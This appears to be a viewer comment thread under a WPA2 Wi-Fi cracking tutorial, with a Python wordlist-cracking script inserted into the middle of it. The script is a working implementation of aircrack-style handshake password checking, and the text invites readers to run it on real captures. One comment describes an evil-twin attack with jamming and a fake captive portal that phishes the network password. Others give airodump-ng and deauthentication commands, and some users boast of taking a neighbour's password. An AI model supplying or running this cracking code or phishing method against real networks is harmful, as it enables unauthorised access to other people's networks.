You can use aircrack, wifite, reaver, etc., but all these methods will only work if the wordlist being used has the actual password within it, or else it's useless. So for those reading, don't assume that you're breaking into everyone's wifi using this method as it did his; the password to his network he had already added into a wordlist that he used to basically cross-reference using aircrack, nothing special.
So what works better for hacking a Wifi?
Thank you Sir. So what are the other methods?
Is there any other method to get it without a word list?
so plz tell me, is there any other powerful method to get the password... without the wordlist method
@@VikramSinghRajput0001 One way is to create an access point that has the same name as the original one. You will need 2 Wi-Fi adapters: one for jamming clients and one for the malicious access point, a.k.a. Evil Twin. The jammer should emit stronger signals or be close in range to disrupt communication and possibly kick devices out of the network. The AP will not have any password but a web server set up.
When your Wi-Fi connection drops frequently (because of the jammer), you'll open up your Wi-Fi settings to see what's happening, and at that moment you will discover the Evil Twin AP, which you will probably connect to with "there's a glitch" in mind. And when you do so, your phone automatically opens a website which will greet you with a fake warning message, e.g. "firmware update", "2-step auth". And there will be an input field where you enter the password of the AP.
Because you already captured the handshake during deauth, you are able to hash whatever the user entered and compare whether it matches the captured one. This allows you to tell users that what they entered is fake and build one layer of trust. This is a bit of an involved process, but tools like EvilTwin and Airgeddon will make it a piece of cake. You can look them up on GitHub.
Do we need to be connected to the internet to perform this attack? Pls someone answer me please
No, you don’t have to be connected to the Internet
thanks for informing me that I should use a chipset that supports monitor mode! thx
No problem!
crunch
If you capture a Handshake or a PMKID with Airgeddon, you choose the WPA/WPA2 Offline Decryption Menu option and then you choose the option "Aircrack + Crunch Brute force attack on the Handshake/PMKID capture file"; it tells me to write the length of the key. How do you know the length of the key?
How do you know if it has only uppercase letters, only lowercase letters, only numbers, only symbols, or if the key has characters of all types?
This method is only efficient if you have previously collected data with you, like the 4-way handshake capture and a ton of info on the password. It's not for entirely finding a password, and it doesn't work like the movies; sometimes you gotta get out there and collect the necessary info before doing something, or the wireless owner should be dumb enough to use passwords that have been in public wordlists for years.
I remember doing this in 2010 with WEP passcodes and Linux BackTrack
Same bro! I can't believe it's still the same process in 2024. Why can't you just capture the handshake and decrypt it instead of using a wordlist?
@@jeremym-i6x the thing is wpa2 is too secure to decrypt
@@jeremym-i6x what? decrypt it instead of matching it through the wordlists? I don't get you, but it seems like it'll be a better way to hack the password which I'll never find in wordlists...
Wait, does that mean it's actually possible to crack my neighbor's WiFi?
@@jeremym-i6x how do you do that?
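The "decrypt the handshake instead of using a wordlist" confusion in this thread, and the earlier crunch question about how you would know the key length, both come down to what a captured handshake actually contains. Added example, not code from the video or its author: the per-candidate check that aircrack-ng performs (PBKDF2 to PMK, PRF-512 to KCK, HMAC-SHA1 MIC compare), run over a small wordlist. The SSID, MAC addresses and nonces are constructed sample values; the passphrase is the one shown in the video.

```python
"""WPA2 candidate check against a 4-way handshake (constructed sample data)."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81  # byte offset of the Key MIC field in an EAPOL-Key frame (802.11i)


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes    # authenticator address (AA)
    sta_mac: bytes   # supplicant address (SPA)
    anonce: bytes    # 32-byte nonce from message 1
    snonce: bytes    # 32-byte nonce from message 2
    eapol: bytes     # message 2 EAPOL-Key frame as captured (MIC field filled in)

    @property
    def mic(self) -> bytes:
        return self.eapol[MIC_OFFSET:MIC_OFFSET + 16]


def pmk(passphrase: str, ssid: str) -> bytes:
    # PBKDF2-HMAC-SHA1 with 4096 rounds is the only place the passphrase enters
    # the protocol; the passphrase is never transmitted, so there is nothing to
    # "decrypt" - every guess has to be re-derived and compared.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck(pmk_bytes: bytes, hs: Handshake) -> bytes:
    # 802.11i PRF-512; only the first 16 bytes (the KCK) are needed for the MIC.
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    out = b"".join(
        hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]),
                 hashlib.sha1).digest()
        for i in range(4))
    return out[:16]


def expected_mic(kck_bytes: bytes, eapol: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the
    # MIC field zeroed, truncated to 128 bits.
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck_bytes, zeroed, hashlib.sha1).digest()[:16]


def check_candidate(candidate: str, hs: Handshake) -> bool:
    return hmac.compare_digest(expected_mic(kck(pmk(candidate, hs.ssid), hs), hs.eapol), hs.mic)


def run_wordlist(words: Iterable[str], hs: Handshake) -> Optional[str]:
    # The wordlist loop itself: a miss on every entry is aircrack's "KEY NOT FOUND".
    for word in words:
        word = word.rstrip("\r\n")
        if check_candidate(word, hs):
            return word
    return None


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    # Minimal EAPOL-Key message 2: key info 0x010a = descriptor v2, pairwise, MIC set.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def constructed_handshake(passphrase: str = "TrytoHackMe2023") -> Handshake:
    # CONSTRUCTED sample: made-up SSID, MACs and nonces; the MIC is derived the
    # way a real client would derive it for the given passphrase.
    ap, sta = bytes.fromhex("02aabbccdd01"), bytes.fromhex("02aabbccdd02")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    hs = Handshake("PatLab-constructed", ap, sta, anonce, snonce, build_msg2(snonce))
    hs.eapol = build_msg2(snonce, expected_mic(kck(pmk(passphrase, hs.ssid), hs), hs.eapol))
    return hs


if __name__ == "__main__":
    sample = constructed_handshake()
    print(run_wordlist(["password", "12345678", "TrytoHackMe2023", "letmein"], sample))
```

Swap `constructed_handshake()` for values pulled out of a real capture (Wireshark shows the nonces and the EAPOL frame bytes) and the same functions answer the wordlist question for that capture.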
The final part is the most haunting, because the cracking process is not as easy as it might look, so your best bet is to create your own password list using crunch if you already know a thing or two about the target, or you can crack the password online with servers equipped with very fast GPUs, but this last choice will cost you money. Personally I prefer to use CRUNCH combined with a good computer that has a powerful GPU and a lot of RAM.
yes it's easy to deauth a device and capture a handshake.. i crack with a different machine running windows.
you might get a better understanding if you learn the method shown in the video before moving on to using more advanced tools without comprehending how it works
It's a really worthy 10 minutes. Thanks for ur efforts ❤
My pleasure 😊
I'm at that point of life again where i think i can become a hacker
Does the method of that video really work for you?
anyone know why the Password.txt doesn't appear to me?
me too. Can u fix it
You have to first unzip it in your Kali Linux app
i don't know if these password lists will ever find anything.. i mean even if i use Rockyou, which has 14 million passwords.. it's still not gonna have my password. I only have my wife's name and some numbers and characters and it still didn't find it.. i mean not all lists will have it all..
yeah cause you are the only person using wifi
Been doing this kind of work since '97. I like your style my man. Cheers
Awesome! Thank you! I appreciate that 😎
@@InfoSecPat of course! Lots of changes happening soon in the pentesting industry... Looking forward to seeing more.
There is no password.txt in my ls bro
Yeah, because that is a wordlist I made. You will not have that.
3:30 lol
are these methods still working in 2024??
When I type iwconfig, I do not get the wlan0 option, do I need to install a driver for it?
sudo apt-get install iwconfig
It's just nonsense; a wordlist may not contain every password! And even if it does, that means millions of combinations.
hello. after running the command "airodump-ng wlan0" my wifi adapter doesn't show me clients. do you know what to do? please help me, my wifi adapter is in monitor mode.
bruteforce?
lucky for some hackers.
easy for some content creators 😅
At the end of the day, it's just a showcase of how the technique is done. Obviously, if you get a hash, you can take it offline and utilize better word lists if you have more time.
My Passwords.txt file didn't appear, sad T_T
Yeah, because that passwords file is one that I made. You can get your own password file off the Internet or you can make your own word list.
Okay, thank you! I will try to generate my list and keep trying. Thanks for the video! @@InfoSecPat
Where did you get password.txt? please explain
It's in the program
In the last click they gave me this message: Failed to open Capture-Par-01.cap (2):No such file or directory
The deauth doesn't appear to be limiting my victim device in any way, and I'm not able to capture the handshake at all, even if I manually reconnect my victim device.
The MAC addresses for both the AP and the victim device are correct, but the victim device still has internet, and no handshake is ever captured..
I already "hacked" it by using Fern, but with a custom wordlist that included the wifi pwd on purpose, just to test that it worked - so in theory it should work using AirCrack too..
Any advice? :)
Oh, and any tips for how I could bruteforce instead of using a wordlist too? :D 💜
You must be in really close range if you're using your internal wifi adapter to be able to do a deauth
Why when I do check kill do I lose wifi
when your wifi card goes into monitor mode, you lose the wifi connection, but you can still continue with whatever capture/attack you're trying to do.
You can turn off monitor mode afterwards and it will start working again
Skip it, it's not mandatory
Because it’s putting your WiFi card in monitor mode
you're probably trying to crack ur own wifi
I was wondering the same thing
It's more like bruteforcing the password bro
I always use WPA2 and WPA3 on another router with a 25-character, very mixed password and I keep WPS disabled. I just got a new router which allows me to install and use WireGuard as my VPN server for 40 bucks. I'm using Mullvad with my Linux setup. However, 1 flaw in my new router is it shows WPS is enabled and there is no option to disable it. With the password I'm using, is my router/VPN server still OK? I used Kali with a program, Wifite, to try and crack the WPS setup I have and it didn't work. I haven't tried every tool but wonder if I should make my password longer or not bother??
I only had success with a WPS exploit when the password was pretty weak. Could they still get my WPS pin? Maybe I'm being extra paranoid but just wondering.
That's a really good question. The best way to do it is to try to crack it. But if you ran Wifite and it didn't crack it, I think you should be in good shape. There's probably other tools out there, but I wouldn't get too crazy about it.
Bro I ran iwconfig on my rooted A51F and by wlan0 it says: IEEE Mode:Managed Frequency:2.412 Ghz Bit Rate :43.3 mb/s ........
What da heck does that mean
My BSSID doesn't have any stations after I ran an airodump -c capture even though I have my phone and other devices connected to the network… pls any idea on what to do
Ever figured it out brother?
not airodump -c, airodump -d (or --bssid) is the switch for the bssid mac
Hey I'm at the end step where I put the word list in and I can put it in, even the rockyou.txt
Hi, I'm totally new. Can you help? When I type this:
airodump-ng -C7 -w Capture-Pat -d 24:D3:F2:F9:1A:28 wlan0mon
Checking available frequencies, this could take few seconds.
Done.
No valid frequency given.
How do I solve this? thank you
put wifi adapter in monitor mode
Hello. Could I ask for a good dictionary.txt? maybe a link? Regards
Can we crack a wpa2 password with the help of rainbow tables?
I wanna see this done with no dictionary and only rainbow tables
Can I use aircrack-ng in termux on android smartphones?
How do I switch my wlan0 channel to another fixed channel?
hi everyone, in my case there is no such thing as Password.txt ...... WHYYYY
That’s a password list that I created.
it's too slow to get the handshake packet, maybe wait a couple of days
How is the password.txt created? Appreciate your answer
I created a password list. You can make your own or use something like rockyou in kali.
@@InfoSecPat is this useful at all for cracking into networks that don't contain this password.txt?
While using wireshark I am facing a problem: failed to create compose table
Please provide me a solution, I am not able to save the file on /home/kali
did you find an answer? i also have a problem like yours
How to do this on Android using Termux? Tell me please
2:53 why does my terminal show no BSSID scanned? There's just a blank space. Help me.
Same
You need an external wifi adaptor
Why is my terminal so slow
Idk why it's slow. How much ram do you have?
The wlan0 text does not appear for me. I have Linux installed on VirtualBox. 1:50
I can't find password.txt, help please
how to use aircrack-ng without rockyou
Bro I just want to play my game
Ok so did you put ur password in the word list or not
How to crack without using a Dictionary?
You can use other techniques like automated Wi-Fi pen testing tools
Is there any method for Android termux with root?
Not so fast. When I tried going into monitor mode, something came up saying 2 filths are doing some crap and I have to kill the interfering processes.
When I did that, only one was killed, which was my NetworkManager, which it disabled.
What do I do, because I don't know
Yeah, remember this is just for demonstration purposes. If the network manager gets disabled, you have to restart the interface. Or just reboot your virtual machine
2:54
followed along and it doesn't show anything after airodump-ng wlan0. my nic is in monitor mode
In the deauthentication process, how do I know which is my access point?
thanks bro .. I got my neighbor's password free now
Don’t do anything you don’t have permission to do. Hope he gave you permission 😊
Would be helpful if you explained what the switches are
bro i cannot handshake, what's my problem
What should I do if the password file I have does not contain the key?
You have to use a password list that may contain the file in this video. It's only for educational purposes and to understand how it's done.
No matter how much I try, only some (2nd and 4th) EAPOL packets are captured. Does anyone know a solution? Fixing the channel, manually reconnecting the device to the AP, or sending a deauth packet doesn't work. Despite extensive searching, I haven't been able to find a solution. Please please help me 😭😭
How do I create a temporary access point like you did, that I can audit?
I just had an extra router that I utilized for this video
you just add your password to your wordlist, that's why it's so quick
Yeah, because it's an educational video on how the process is done
@@InfoSecPat I would like to see how it is done in real conditions, where the victim is far away, but not so far that the connection is impossible. Such a test requires two people: one comes up with a quite complicated password and allows the second person to try to crack it.
wow. finally someone with a brain....
Why is there no password.txt in my file??
That file is my own
Is it possible to perform this with Twitter authentication codes?
No, I don’t believe so.
just out of curiosity, why do i need an external wireless card even for a laptop?
Cause it needs packet injection
i like to use KONSOLE and split the view; makes it easy to airodump in one terminal while you aireplay in a second terminal, all in the same window.. u can't sudo apt install it though, has to be built from script
also bro, not to bust your chops, but your cap file is gonna be polluted with deauth packets; you don't even need to start airodump writing the output until AFTER you deauth the device.. if you watch the number of lost frames you can see exactly when the device's connection gets reset, and then start airodump -w
I don't get the eapol capture, need help!!!
do i have to run kali linux for the mac monterrey to read the 10.15?
I’m not sure what you’re asking. I’m sorry.
why don't i have EAPOL files in wireshark? and when i track my iphone under "Notes" it doesn't say "EAPOL", nothing stands there...
where did you find that password.txt file that contains the password "TrytoHackMe2023"?? what if the password is in a different language, e.g. french, urdu etc., or a number?
It’s a word list that I created for demonstrating in this video. You’re not gonna have that file.
Dear Pat, thank you for such a useful tutorial. Unfortunately, I am even less than a beginner and the operation is broken up because the network disconnects me during the process. I am using Kali Linux 24.2. I'm following step by step exactly as you are showing us! Thank you! My aim is to be the second Kevin Mitnick
The reality is quite different...
Can i hack a wifi without any adaptor? please tell me
Nope, you need it
yeah mate, mine is just showing 2 with no wireless extensions on it??
Just make sure the driver is installed for your wireless card
❤❤❤❤❤❤👋👋👋👋👋❤
nice video
Thanks for the visit
Second time going over this video in conjunction with many other leading ethical hacking/Kali Linux videos, and I appreciate your thoroughness in explanation and the way you show it as well. Keep it up.
I tried and get an error getting the password?
but you did not show how the iso for the wordlist is in the terminal
That's my wordlist I created
if you think you can crack wpa2psk, forget it. it's possible but not happening in the real world
you show us a revealed password but don't indicate how you actually did it and also what dictionary you used. upload it or tell us where it is?
Simplified, basic. But hopefully script kiddies don't try to use this in the real world or they will get a knock on the door or worse.
bro i did not find eapol, how to fix it?
Make sure you did all the steps
KEY NOT FOUND
for me i tried it on my wifi and that's what i got, i think that's because the password is in CAPITAL letters
what does the "password.txt" contain? That's what's important around here!
Where I found the password.txt, is it the same as the Rock?
It’s a password list that I created myself
@@InfoSecPat with only rock.txt I can't break the password 🔑 maybe I need to find another list? 🤔
Just let my neighbour know his password after I shut down his network to prove my point.
I used a 500,000 word dictionary based on animals, characters, popular names etc. I found the password @ 48% and 2:36 seconds.
Strange that my PCI AC1300 refuses to go into monitor mode but my $5 Asus USB-N13 has no problems? 🤔
Could it be a driver error?
I don’t want to know how to use it. I want to learn how it works, so I can make my own version of it.
hey after the airodump-ng wlan0 command it doesn't show any networks but it switches between channels and all that
did u find a solution for this?
9:13 i don't get the purple words... and i don't know why
Those are my folders
When I use "airodump-ng wlan0" no connection appears even as time elapses, what can I do?
It's because you don't have a wifi adapter
Use wlan0mon
an alternative to this would be wifite2
I did not understand how to activate the new tab, because I opened a new tab, turned on root, and followed the steps, but it did not work
Please make a video on the channel changing issue in airodump-ng because there is no video on RUclips regarding this issue
Do i need a wifi adapter? Because some commands don't work
Ofc you need that
Yes, you need an external adapter that supports promiscuous mode
Whenever i try to send deauth packets i keep getting bssid not found
Can you share the password.txt file?
Can someone do step-by-step notes for me in Notes
Please I need it in Words
do I need to do the same steps every time I want to hack a wifi?
Hello, why does the password.txt not appear to me when I run ls? what is the problem